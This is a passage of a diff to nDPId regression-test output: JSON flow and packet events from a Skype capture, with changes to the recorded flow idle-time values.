-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1431970651444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651444,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0trlAAEAGOXXAqAEinTfrk8gmAbvxz5x8Zu7sLYAQECzWVQAAAQEICj4xyABMYEfJ"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1431970651510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651510,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGYo1BN98twKgBIgG7yCcCmRcOzq5mc6ASOJDW4gAAAgQFrAQCCApNlOogPjHHwQEDAwk="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1431970651510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651510,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03TJAAEAGe2LAqAEiQTffLcgnAbvOrmZzApkXD4AQECwtjQAAAQEICj4xyEFNlOog"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1431970651677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651677,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOdv3UotwKgBIgG7yCgNTasLSHrPs6ASOJD34AAAAgQFrAQCCApNh63LPjHHwQEDAwk="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1431970651677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651677,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CgxAAEAGtOPAqAEib91KLcgoAbtIes+zDU2rDIAQECxN5QAAAQEICj4xyOdNh63L"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1431970650909,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650909,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWyCXC803gcKyPMKASOJCo1gAAAgQFrAQCCApOqL1kPjHFcQEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1431970650910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650910,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0eB9AAEAG4PLAqAEinTeCsMglnFZwrI8wwvNN4YAQECz\/hAAAAQEICj4xxe1OqL1k"} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABADJRAAEAG447AqAEinTfrk8gmAbvxz5x7AAAAALAC\/\/+ORwAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+dJAAEAGXrbAqAEiQTffLcgnAbvOrmZyAAAAALAC\/\/9P1wAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABAiTBAAEAGNbPAqAEib91KLcgoAbtIes+yAAAAALAC\/\/\/TJAAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1431970651444,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651444,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iadN+uTwKgBIgG7yCZm7uws8c+cfKASOJB\/agAAAgQFrAQCCApMYEfJPjHHwQEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1431970651444,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651444,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0trlAAEAGOXXAqAEinTfrk8gmAbvxz5x8Zu7sLYAQECzWVQAAAQEICj4xyABMYEfJ"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1431970651510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651510,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGYo1BN98twKgBIgG7yCcCmRcOzq5mc6ASOJDW4gAAAgQFrAQCCApNlOogPjHHwQEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1431970651510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651510,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03TJAAEAGe2LAqAEiQTffLcgnAbvOrmZzApkXD4AQECwtjQAAAQEICj4xyEFNlOog"} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1431970651677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651677,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOdv3UotwKgBIgG7yCgNTasLSHrPs6ASOJD34AAAAgQFrAQCCApNh63LPjHHwQEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1431970651677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651677,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CgxAAEAGtOPAqAEib91KLcgoAbtIes+zDU2rDIAQECxN5QAAAQEICj4xyOdNh63L"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9fnAAAEARsRvAqAEi1cezkjLdgQkAKdgxevUC7H9CpX1vDFjUgifamALKVmn9IG\/Fgz6DNfXKD8OP"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -299,10 +299,10 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5DD0AAEARIzfAqAEi1cezrjLdnFkAJTHjev0CDsFSgVTjU3l7SB\/6pLcIO\/MFhUO5HKYdIt4="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652388,"flow_last_seen":1431970652388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970652388,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1431970652388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970652388,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw4RAAEAGlYHAqAEinTeCsMgpAbtXW5NMAAAAALAC\/\/+W4QAAAgQFtAEDAwUBAQgKPjHLqwAAAAAEAgAA"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1431970652513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970652513,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7yCm78+IiV1uTTaASOJDDlAAAAgQFrAQCCApOqL71PjHLqwEDAwk="} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1431970652513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970652513,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+sxAAEAGXkXAqAEinTeCsMgpAbtXW5NNu\/PiI4AQECwaQwAAAQEICj4xzCdOqL71"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652388,"flow_last_seen":1431970652388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970652388,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1431970652388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970652388,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw4RAAEAGlYHAqAEinTeCsMgpAbtXW5NMAAAAALAC\/\/+W4QAAAgQFtAEDAwUBAQgKPjHLqwAAAAAEAgAA"} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1431970652513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970652513,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7yCm78+IiV1uTTaASOJDDlAAAAgQFrAQCCApOqL71PjHLqwEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1431970652513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970652513,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+sxAAEAGXkXAqAEinTeCsMgpAbtXW5NNu\/PiI4AQECwaQwAAAQEICj4xzCdOqL71"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyWSMAAEARpePAqAEib91KDTLdnEkAHvqKev8C0IwzOBgB3UEKOkJTX5CI9Vwhwg=="} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -348,8 +348,8 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5UAAEARk+DAqAEi1cezpTLdnEQALDM7exsCCwiB5Tp\/+eOgtAg8Bibngtvk3Z9waqj3cY7b3c6tDEmT"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAABANxVAAEAGcHTAqAEinTg0LMgunFRemxUUAAAAALAC\/\/+0UAAAAgQFtAEDAwUBAQgKPjHZGQAAAAAEAgAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAABANxVAAEAGcHTAqAEinTg0LMgunFRemxUUAAAAALAC\/\/+0UAAAAgQFtAEDAwUBAQgKPjHZGQAAAAAEAgAA"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyDf8AAEARix7AqAEinTeCnDLdnFMAHh0Aex0Cxk3n0hRKPcgDeocb540rNGApyA=="} 
00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
